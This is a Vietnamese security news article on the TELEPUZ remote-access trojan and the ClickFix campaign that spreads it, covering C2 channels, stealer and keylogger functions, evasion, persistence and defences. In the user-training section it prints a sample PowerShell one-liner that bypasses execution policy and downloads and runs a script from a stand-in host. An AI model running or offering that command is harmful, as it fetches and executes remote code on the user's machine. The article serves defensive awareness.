Mã độc TELEPUZ: Nguy hiểm từ chiến dịch tấn công ClickFix trên Windows

Mã độc TELEPUZ: Nguy hiểm từ chiến dịch tấn công ClickFix trên Windows

Một chiến dịch tấn công mạng ClickFix mới đang lừa đảo người dùng Windows thực thi các lệnh độc hại thông qua các trang web giả mạo. Chiến dịch này triển khai mã độc TELEPUZ, một phần mềm truy cập từ xa (RAT) gọn nhẹ nhưng cực kỳ mạnh mẽ, có khả năng nhận hàng chục lệnh khác nhau từ kẻ tấn công. Mối đe dọa này cho thấy sự tinh vi trong các kỹ thuật lừa đảo người dùng để đạt được quyền truy cập ban đầu vào hệ thống.

Chiến dịch mã độc TELEPUZ tận dụng hành vi của người dùng, biến các thao tác đơn giản thành điểm khởi đầu cho một cuộc xâm nhập sâu rộng. Việc hiểu rõ cơ chế hoạt động của chiến dịch này là rất quan trọng để tăng cường an ninh mạng cho tổ chức và cá nhân.

Cơ chế hoạt động của chiến dịch tấn công mạng ClickFix

Cuộc tấn công bắt đầu với một trang xác minh giả mạo, yêu cầu người dùng sao chép và thực thi một lệnh cụ thể. Đây là một kỹ thuật lừa đảo khéo léo, lợi dụng sự thiếu cảnh giác của người dùng để khởi tạo chuỗi tấn công.

Hành động sao chép và thực thi lệnh này sẽ tải về giai đoạn thứ hai dựa trên mã độc VIDAR. Sau đó, VIDAR tiếp tục tải về bộ nạp TELEPUZ cùng với payload chính của nó. Mô hình này phù hợp với các chiến dịch tấn công mạng ClickFix gần đây, nơi hành động của người dùng bị lợi dụng để thiết lập quyền truy cập ban đầu.

Tổng quan về mã độc TELEPUZ

Theo báo cáo của Elastic, mã độc TELEPUZ đã hoạt động từ cuối tháng 4 năm 2024 và đang phát triển rất nhanh chóng. Các nhà nghiên cứu đã quan sát thấy việc tải lên thường xuyên các phiên bản mới và sự gia tăng đáng kể trong hoạt động từ đầu tháng 6, cho thấy chiến dịch này đang mở rộng quy mô. Báo cáo chi tiết có thể được tìm thấy tại Elastic Security Labs.

Kiến trúc Modular và sự phát triển

Mã độc TELEPUZ được thiết kế để giữ kích thước nhỏ ban đầu và chỉ tải xuống các tính năng bổ sung khi cần thiết. Phương pháp này cho phép kẻ tấn công thêm các chức năng như đánh cắp thông tin, ghi lại thao tác bàn phím (keylogging), thao túng trình duyệt mà không cần tích hợp tất cả các khả năng vào tệp ban đầu.

Thiết kế modular giúp mã độc TELEPUZ trở nên linh hoạt và khó bị phát hiện hơn. Nó cho phép kẻ tấn công tùy chỉnh khả năng của mã độc cho từng mục tiêu cụ thể, tối ưu hóa hiệu quả của cuộc tấn công.

Giao tiếp và khả năng phục hồi C2

Mã độc TELEPUZ giao tiếp với máy chủ command-and-control (C2) của mình thông qua WebSockets, sử dụng giao thức dựa trên JSON để trao đổi thông tin và nhận các tác vụ. Giao thức này cung cấp một kênh liên lạc ổn định và linh hoạt.

Trong trường hợp mất liên lạc với máy chủ chính, mã độc TELEPUZ có thể liên tục thử kết nối lại hoặc tìm kiếm cơ sở hạ tầng thay thế thông qua nhiều kênh khác nhau. Các kênh này bao gồm Telegram, hồ sơ Steam, bản ghi DNS hoặc một hợp đồng thông minh trên blockchain Polygon.

Sự đa dạng trong các kênh liên lạc C2 thể hiện khả năng phục hồi cao của mã độc TELEPUZ. Điều này khiến việc ngắt kết nối và vô hiệu hóa mã độc trở nên khó khăn hơn đối với các đội ngũ an ninh mạng.

Các khả năng điều khiển và đánh cắp dữ liệu

Với 36 lệnh có sẵn, kẻ tấn công có quyền kiểm soát rộng rãi đối với thiết bị bị nhiễm. Các lệnh này bao gồm khả năng thực thi lệnh, liệt kê tệp và quy trình, chụp ảnh màn hình, tải lên dữ liệu, tạo kho lưu trữ ZIP, xóa tệp, thay đổi khoảng thời gian beacon, cập nhật mã độc và chấm dứt các tác vụ.

Một số lệnh được xây dựng đặc biệt để đánh cắp thông tin đăng nhập và tiếp tục xâm nhập. Mã độc TELEPUZ có thể truy xuất một module đánh cắp (stealer module), khởi động keylogger, trích xuất cookie trình duyệt Chromium, tải xuống các module mã độc khác và chạy các tệp thực thi bên trong các quy trình bị rỗng (hollowed processes).

Những khả năng này đặt mã độc TELEPUZ vào nhóm các mối đe dọa chuyên nhắm mục tiêu vào thông tin đăng nhập và cookie trình duyệt. Các hành vi này thể hiện nguy cơ cao về rò rỉ dữ liệu nhạy cảm và chiếm quyền điều khiển tài khoản.

Kỹ thuật tiêm mã vào trình duyệt

Mã độc TELEPUZ cũng bao gồm một module tiêm mã web có thể tương tác với các trình duyệt dựa trên Chromium và Firefox. Module này không chỉ dựa vào các kỹ thuật tiêm mã trình duyệt truyền thống.

Thay vào đó, nó có thể sử dụng giao diện gỡ lỗi của trình duyệt để chặn các trang, thực thi JavaScript, quản lý quy tắc và có khả năng thay đổi các trường biểu mẫu tài chính. Kỹ thuật này đặc biệt nguy hiểm đối với các giao dịch trực tuyến và bảo mật thông tin cá nhân.

Cơ chế né tránh và duy trì sự tồn tại

Trước khi bắt đầu các hoạt động thông thường, mã độc TELEPUZ kiểm tra xem nó có đang chạy trong môi trường máy ảo (VM), sandbox, trình gỡ lỗi (debugger) hay trong một khu vực địa lý bị loại trừ hay không. Điều này giúp mã độc tránh bị phát hiện và phân tích.

Ngoài ra, mã độc TELEPUZ còn sử dụng các chuỗi được mã hóa, tra cứu API động, các cuộc gọi hệ thống gián tiếp và các bản vá được thiết kế để làm suy yếu khả năng quét chống mã độc và theo dõi sự kiện của Windows. Đây là những kỹ thuật né tránh phức tạp, tăng cường khả năng ẩn mình của mã độc.

Để duy trì sự tồn tại (persistence) trên hệ thống, mã độc có thể sao chép chính nó từ các thư mục tạm thời, khởi chạy lại thông qua rundll32.exe, bỏ qua Kiểm soát Tài khoản Người dùng (UAC), đánh cắp các mã thông báo truy cập có đặc quyền cao hơn và đăng ký một dịch vụ Windows. Những bước này có thể biến một lỗi nhấp chuột đơn giản thành một sự xâm nhập kéo dài, khó điều tra.

Chỉ số IOC (Indicators of Compromise)

Do tính chất liên tục thay đổi của các chiến dịch tấn công mạng ClickFixmã độc TELEPUZ, các chỉ số thỏa hiệp (IOC) cụ thể như địa chỉ IP, tên miền và hàm băm tệp thường xuyên được cập nhật. Các nguồn threat intelligence đáng tin cậy sẽ cung cấp thông tin mới nhất.

Mặc dù tài liệu gốc không cung cấp danh sách IOC cụ thể cho chiến dịch này, nhưng dựa trên hành vi của mã độc, các đội ngũ an ninh mạng nên chú ý đến các loại IOC sau:

  • Tên miền và địa chỉ IP C2: Các máy chủ được sử dụng để giao tiếp Command-and-Control.
  • Hàm băm tệp (File Hashes): SHA256, MD5 của các tệp thực thi liên quan đến TELEPUZVIDAR loader.
  • Đường dẫn tệp độc hại: Các vị trí mà mã độc tự sao chép để duy trì sự tồn tại.
  • Tên dịch vụ Windows độc hại: Các dịch vụ mới được đăng ký bởi mã độc TELEPUZ.
  • Mẫu lưu lượng mạng: Lưu lượng WebSocket không bình thường đến các máy chủ C2 hoặc thông qua các kênh phụ như Telegram, Steam.

Các tổ chức nên tích hợp thông tin threat intelligence vào hệ thống SIEM (Security Information and Event Management) hoặc EDR (Endpoint Detection and Response) để tự động phát hiện và ứng phó với các IOC này. Việc chia sẻ thông tin IOC giữa các cộng đồng an ninh mạng cũng góp phần nâng cao khả năng phòng thủ chung.

Khuyến nghị phòng ngừa và phòng thủ

Để bảo vệ hệ thống khỏi các mối đe dọa như mã độc TELEPUZ và chiến dịch tấn công mạng ClickFix, các tổ chức và người dùng cần thực hiện nhiều biện pháp đồng bộ để tăng cường bảo mật thông tin.

Nâng cao cảnh giác cho người dùng

Các tổ chức cần đào tạo người dùng về tầm quan trọng của việc không bao giờ dán các lệnh từ lời nhắc trình duyệt vào cửa sổ Run, Command Prompt hoặc PowerShell. Đây là một điểm yếu phổ biến mà các chiến dịch tấn công như ClickFix thường khai thác.

Ví dụ về lệnh có thể bị lừa dán:

powershell -NoP -NonI -Exec Bypass -C "IEX (New-Object System.Net.WebClient).DownloadString('http://evil.com/payload.ps1')"

Cần nhấn mạnh nguy cơ của việc thực thi các lệnh không rõ nguồn gốc. Người dùng nên được khuyến khích luôn xác minh thông tin và tìm kiếm sự hỗ trợ kỹ thuật khi gặp các yêu cầu đáng ngờ.

Các biện pháp phòng thủ kỹ thuật

Các đội ngũ bảo mật nên theo dõi hoạt động PowerShell và rundll32.exe bất thường. Việc phát hiện sớm các quy trình hoặc tham số lệnh bất thường có thể chỉ ra sự xâm nhập của mã độc TELEPUZ.

Chặn các chỉ số thỏa hiệp đã được liệt kê (IOCs) thông qua hệ thống tường lửa, proxy hoặc các giải pháp bảo mật khác. Sử dụng lọc DNS và web để ngăn chặn kết nối đến các miền C2 và các trang lừa đảo. Ngay lập tức cô lập các điểm cuối bị nghi ngờ để ngăn chặn mã độc lây lan.

Sau khi xác nhận bị nhiễm, ưu tiên xử lý việc đánh cắp phiên trình duyệt. Đặt lại các mật khẩu bị lộ, thu hồi các phiên hoạt động và luân chuyển các thông tin đăng nhập có đặc quyền. Kiểm tra dữ liệu trình duyệt để tìm kiếm bất kỳ dấu hiệu xâm phạm nào là bước cần thiết.

Hệ thống giám sát điểm cuối (endpoint monitoring) nên được cấu hình để tìm kiếm các tải xuống module bất thường và lưu lượng truy cập WebSocket đi ra. Những hoạt động này có thể là dấu hiệu rõ ràng của mã độc TELEPUZ đang giao tiếp với máy chủ C2, tương tự như các hoạt động được mô tả trong các chiến dịch mã độc sử dụng WebSocket khác.

Việc triển khai giải pháp EDR mạnh mẽ có khả năng phát hiện các hành vi bất thường, từ việc tạo process đến các hoạt động mạng, sẽ giúp phát hiện sớm các giai đoạn tấn công. Đảm bảo các bản vá bảo mật mới nhất được áp dụng cho hệ điều hành và các ứng dụng, đặc biệt là trình duyệt web, để giảm thiểu các lỗ hổng khai thác.

Áp dụng nguyên tắc đặc quyền tối thiểu (least privilege) cho người dùng và ứng dụng. Hạn chế quyền thực thi đối với các tệp và lệnh không cần thiết có thể ngăn chặn các hành vi độc hại của mã độc TELEPUZ. Thường xuyên sao lưu dữ liệu quan trọng và kiểm tra tính toàn vẹn của các bản sao lưu để đảm bảo khả năng phục hồi sau tấn công.

Đầu tư vào các giải pháp Threat Intelligence để cập nhật liên tục về các mối đe dọa mới nhất, bao gồm cả các biến thể của mã độc TELEPUZ. Thông tin này giúp các đội ngũ bảo mật chủ động hơn trong việc xây dựng các chính sách và biện pháp phòng thủ hiệu quả.